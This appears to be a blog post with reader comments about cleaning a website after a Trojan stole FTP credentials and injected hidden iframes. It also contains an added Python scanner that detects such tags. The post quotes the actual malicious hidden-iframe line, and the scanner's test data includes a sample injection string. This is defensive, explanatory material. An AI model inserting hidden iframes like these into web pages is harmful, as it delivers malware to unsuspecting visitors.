
How to solve an iframe injection caused by Trojan malware

What is <IFRAME>?

The <iframe> tag defines an inline frame that embeds another document. We use the <iframe> tag to include another document inside a website page.

For example, I use the following iframe code to insert syndicated Salesforce.com content inside my website. Please refer to the image below.

<iframe id="blockrandom"
    name="iframe" src="http://probyte2u.com/salesforce.html"
    width="100%"
    height="1300"
    scrolling="auto"
    align="top"
    frameborder="0"
    class="wrapper">
This option will not work correctly. Unfortunately, your browser does not support inline frames.
</iframe>


Salesforce Content inserted using

Basically, you now have a rough idea of <IFRAME> and its usage!

Now, what does IFRAME injection mean?

Iframe injection means that attackers insert their own iframe code into your website pages. They use Trojan malware to do it.

Normally they will target your index.html, index.php, default.php or configuration.php pages.

They insert their code into your website, so that when visitors view the page, malicious code is downloaded onto the visitor's personal computer, both to replicate the process and to retrieve the visitor's financial and identity details.

Their main purpose is financial gain, and some of them use it for political purposes. They can also infect a lot of PCs and use them to launch a Distributed Denial of Service (DDoS) attack against their target.

From my own personal experience, I first encountered this problem when I tried to access my website and got the following error.

Parse error: syntax error, unexpected '/' in /home/+++++/public_html/index.php on line 85

So I checked the index.php file and found the following code inserted inside it.

The iframe injection was not done properly: there was an additional "/" symbol at the start of the injected iframe, as shown below, so it was detected and the website code did not download the malicious code.

/

<iframe src="http://{URL HAS BEEN REMOVED}.cn:8080/ts/in.cgi?pepsi49" width=125 height=125 style="visibility: hidden"></iframe>

If the iframe injection had been done properly, then all the visitors to the infected site would most probably have been infected with malware.

A sample of the Mozilla warning for a Reported Attack Site is shown below.

Reported Attack Site

So what I did was remove the iframe injection from the infected file and upload the new files. Plus, I changed the FTP details for the website.

My site was safe for a few days; unfortunately the same problem occurred after a while. I was suspicious about how the hacker was able to access my website.

So I checked with my hosting provider how my website was hacked.

Only then did I learn that my personal computer was most probably infected by a Trojan virus and the hacker had automated the whole process.

The Trojan virus managed to steal all my websites' usernames and passwords that were saved in the file transfer protocol (FTP) software that I used. All the websites that I managed using the FTP software were infected with the iframe injection.

Luckily, I had backup files for my website that were not infected.

Since a lot of the files had been infected, I had no other choice but to restore the entire site using the backup files. I changed my FTP username and password.

To prevent the problem from recurring I installed Kaspersky Internet Security, but the problem still happened again. (See my latest update below.)

I still have not figured out the root cause, so the potential for it to happen again is there!

If your problem is not as serious as mine, then you could resolve it using the steps below.

How to eliminate this problem

Use the paid version of Kaspersky Antivirus, update the virus signatures ("pattern"), and scan your computer. Clean all infected files on your computer.

How to clean the infected php or html pages in my web site?

1. Refer to the Google badware notice, like this one.

Approximately 6 files have been injected. You can search your index.php and index.html for the injected lines of code.

You can also download copies of your public_html if there are too many injected files (zip public_html, or zip it folder by folder). Uncompress the zip file on your desktop. Kaspersky will notify you of the injected files. Do not let it clean the files; just save the log file so you can edit them manually. Using this method, your pages will not be destroyed or altered by Kaspersky.

2. Change your FTP/cPanel login information. Avoid using the same password for web registrations; your FTP password should not be recycled. Some fake websites harvest this information and perform iframe injection across the web.

3. Sort your files by date in the FTP window. You can check the most recently edited pages (around the infection date) for injected code.

4. You can revert to a public_html backup. This method is not advisable and should be used as a last resort if you cannot find the infected pages. If your pages have been infected for more than a month, most probably your backup files also contain the injected code.

5. Also remember NOT to save the username and password of your website inside your file transfer protocol software. From my own experience, the Trojan virus managed to steal the information from the FTP software.
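An added example, not code from the article, that automates steps 1 and 3 of the cleaning procedure above and flags injections of the kind shown earlier on the page (a CSS-hidden iframe pointing at a host the site does not own, on an unusual port): a Python scanner that walks a web root and reports every suspicious iframe tag with its file, line number and modification time, newest first, without modifying anything (mirroring the "do not clean, just save the log" advice). The `probyte2u.com` allow-list entry is taken from the page's own legitimate iframe; the `injected.example.invalid` host, the sample page contents and the set of scanned extensions are constructed assumptions for the demo.

```python
"""Report-only scanner for injected <iframe> tags in a web root (added example)."""
import re
import tempfile
import time
from pathlib import Path
from urllib.parse import urlsplit

# Heuristics matching the injection shown in the article: the frame is hidden
# with CSS and its src points at a foreign host, often on a non-standard port.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE | re.DOTALL)
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
SCAN_EXTENSIONS = {".php", ".html", ".htm", ".js", ".tpl"}  # assumption: typical site files


def suspicious_iframes(text, own_hosts):
    """Return (line_number, tag, reasons) for each iframe in text that looks injected."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        tag = m.group(0)
        reasons = []
        if HIDDEN_RE.search(tag):
            reasons.append("hidden via CSS")
        src = SRC_RE.search(tag)
        if src:
            parts = urlsplit(src.group(1))
            host = (parts.hostname or "").lower()
            if host and host not in own_hosts:
                reasons.append("src host not in allow-list: " + host)
            try:
                port = parts.port
            except ValueError:  # malformed port still counts as suspicious
                port = -1
            if port not in (None, 80, 443):
                reasons.append("non-standard port %d" % port)
        if reasons:
            line = text.count("\n", 0, m.start()) + 1  # 1-based line of the tag
            hits.append((line, tag, reasons))
    return hits


def scan_tree(root, own_hosts, modified_within_days=None):
    """Walk root and list suspicious iframes, newest file first (the 'sort by date' step)."""
    cutoff = None
    if modified_within_days is not None:
        cutoff = time.time() - modified_within_days * 86400
    report = []
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in SCAN_EXTENSIONS:
            continue
        mtime = path.stat().st_mtime
        if cutoff is not None and mtime < cutoff:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        for line, tag, reasons in suspicious_iframes(text, own_hosts):
            report.append({"file": path.relative_to(root).as_posix(), "line": line,
                           "mtime": mtime, "tag": tag, "reasons": reasons})
    report.sort(key=lambda r: r["mtime"], reverse=True)
    return report


# Constructed sample pages: the legitimate iframe from the article, and an
# injection shaped like the one shown on the page with a placeholder host.
LEGIT_PAGE = """<html><body>
<iframe id="blockrandom" name="iframe" src="http://probyte2u.com/salesforce.html"
 width="100%" height="1300" frameborder="0"></iframe>
</body></html>
"""
INFECTED_PAGE = """<?php
echo "site content";
?>
<iframe src="http://injected.example.invalid:8080/ts/in.cgi?pepsi49" width=125 height=125 style="visibility: hidden"></iframe>
"""


def demo():
    """Build a throwaway web root with constructed files and scan it."""
    with tempfile.TemporaryDirectory() as root:
        (Path(root) / "about.html").write_text(LEGIT_PAGE)
        modules = Path(root) / "modules"
        modules.mkdir()
        (modules / "index.php").write_text(INFECTED_PAGE)
        (Path(root) / "style.css").write_text("body {}")  # not a scanned extension
        return scan_tree(root, own_hosts={"probyte2u.com"})


if __name__ == "__main__":
    for finding in demo():
        print("%s:%d  %s" % (finding["file"], finding["line"], "; ".join(finding["reasons"])))
```

Run it against a downloaded copy of public_html by calling scan_tree with that folder, your own domain(s) in own_hosts and, if you know roughly when the infection started, modified_within_days set accordingly. A tag found this way is still found when the injection is malformed, as with the stray "/" in the author's index.php, because the scanner matches the iframe text itself rather than relying on the page parsing cleanly.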

Latest Update

They have injected my site again! (This happened in July 2009.)

The problem started when I accessed my site to upload a file. Before that, there was no problem.

Looks like I need to iron out the loopholes.

Managed to get my sites back!

I am not very sure how they did it!

But I have taken some precautionary measures to prevent it from happening again:

  1. I always back up my website content, even before there was any problem. I would recommend you do so too. If your files get infected, you can solve the problem very fast.
  2. Always change your cPanel/FTP password after you have uploaded content to your site.
  3. Don't simply upload content via FTP, because my problem always started when I uploaded content via FTP.
  4. Don't keep your username and password in your FTP software.
  5. Always scan your PC with a paid antivirus to detect any virus.
  6. I am using Google Chrome's incognito mode to access my cPanel and FTP. I am not sure whether this can solve it or not; let me check and see whether it works.
  7. Don't install a lot of unnecessary plugins/modules/components in your content management system website; it takes a lot of effort to clean up. I am waiting for the latest update to clean up all the corrupted files.
  8. I asked Kaspersky Lab Support to analyze my personal computer details to check whether any virus still resides on my PC. Luckily they didn't find any trace of a virus. Please refer to the link below for the correspondence between me and Kaspersky Lab.
  9. Kaspersky Lab Technical Support Service to Help Detect Virus and Trojan


Still safe till now; it's been more than 1 month since writing this article. Hopefully the problem will not reoccur!


Dan 2 years ago

URL below provides a solution to this trojan

http://www.qualitycodes.com/tutorial.php?articleid

probyte2u 2 years ago

Thank you Dan for your information and lead. You point out another way to resolve the problem.

ko zay 2 years ago

Thank you Dan, I am facing the same problem also.

Fernando 2 years ago

Thanks very much for your history and help for those of us who suffer the same problem. I'm now doing some of the points you describe and I hope this can help my site.

thanks

Pedja 2 years ago

Saving passwords usually has nothing to do with stealing. The Trojan scans FTP connections and steals passwords from them. It does not matter if you saved it or typed it in. Some Trojans even log the keyboard to steal typed passwords.

What you actually have to do is find and remove the Trojan itself, which is hard to do.

HijackThis and Malwarebytes' Anti-Malware may help.

probyte2u 2 years ago

Hi Pedja, thank you for stopping by and for the comment.

But in my infection, the Trojan got the password from the FTP software which I use.

There were a few sites which I had not accessed for a few months using the FTP software. I didn't initiate any FTP connections for those sites.

I kept the usernames and passwords of the sites in the FTP software.

And this variant managed to get the usernames and passwords from the FTP software and started injecting the iframe code into the sites.

The Trojan writer really knows the loopholes to do it. I must admit it was quite brilliantly done.

Once my PC got infected, I noticed my Internet traffic and CPU usage were always high. This is the first symptom of the infection.

probyte2u 2 years ago

Dave's comments:

"I have the same problems and have to sort it out now.

I have also read elsewhere that ftp passwords are not secure in ftp software so I won't be storing them in my ftp client anymore."

Hi Dave,

I have removed your website link because your site has a virus infection. My Kaspersky just alerted me to the problem.

Rameshkumar 2 years ago

Thanks for your post.

The same issue for my websites.

Steve 2 years ago

If you’re on VPS/dedicated hosting, grab yourself a copy of Upload Guardian - http://www.serverprogress.com/upload_guardian.php It scans for iframe injections and other malicious tools hackers use to modify your pages. The scanning is done on files in real time via FTP/PHP, and it will block the attacker at the firewall and can send email alerts.

probyte2u 2 years ago

Hi Steve, thanks for the information. A very useful solution for web hosting companies.

07Angel01 23 months ago

Thanks, you taught me a lot of things that I did not know before. Great hub!

probyte2u 23 months ago

Hi 07Angel01, thanks for the visit.

BCP 22 months ago

I'm probably just paranoid, but now I've got to go check a few index.php files. Good info, thanks for the post.
